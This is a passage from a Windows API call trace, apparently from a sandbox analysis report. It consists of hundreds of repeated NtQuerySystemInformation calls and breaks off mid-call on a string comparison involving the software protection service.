(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0284.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0284.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0284.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0284.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0284.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0284.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0284.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x20, ResultLength=0x0) [0284.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0284.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x20, ResultLength=0x0) [0284.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0284.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0284.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x58, ResultLength=0x0) [0284.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0284.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x28, ResultLength=0x0) [0284.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x28, ResultLength=0x0) [0284.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x28, ResultLength=0x0) [0284.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x28, ResultLength=0x0) [0284.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x28, ResultLength=0x0) [0284.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0284.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0284.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x28, ResultLength=0x0) [0284.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x28, ResultLength=0x0) [0284.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0284.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0284.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x20, ResultLength=0x0) [0284.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9a0, Length=0x20, ResultLength=0x0) [0284.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9a0, Length=0x20, ResultLength=0x0) [0284.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9a0, Length=0x20, ResultLength=0x0) [0284.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0284.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0284.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0284.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0284.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0284.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0284.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0284.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0284.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0284.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0284.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0284.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0284.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0284.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caa0, Length=0x20, ResultLength=0x0) [0284.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caa0, Length=0x20, ResultLength=0x0) [0284.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x50, ResultLength=0x0) [0284.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf30, Length=0x38, ResultLength=0x0) [0284.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x28, ResultLength=0x0) [0284.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x28, ResultLength=0x0) [0284.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x28, ResultLength=0x0) [0284.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x28, ResultLength=0x0) [0284.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x28, ResultLength=0x0) [0284.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf30, Length=0x38, ResultLength=0x0) [0284.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x28, ResultLength=0x0) [0284.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x28, ResultLength=0x0) [0284.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf30, Length=0x38, ResultLength=0x0) [0284.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x20, ResultLength=0x0) [0284.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0284.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0284.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0284.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf30, Length=0x38, ResultLength=0x0) [0284.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x20, ResultLength=0x0) [0284.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd40, Length=0x20, ResultLength=0x0) [0284.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd40, Length=0x20, ResultLength=0x0) [0284.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x50, ResultLength=0x0) [0284.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0284.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0284.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0284.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0284.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0284.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0284.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0284.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0284.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0284.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0284.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0284.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0284.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0284.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0284.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0284.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0284.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0284.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0284.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.501] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", 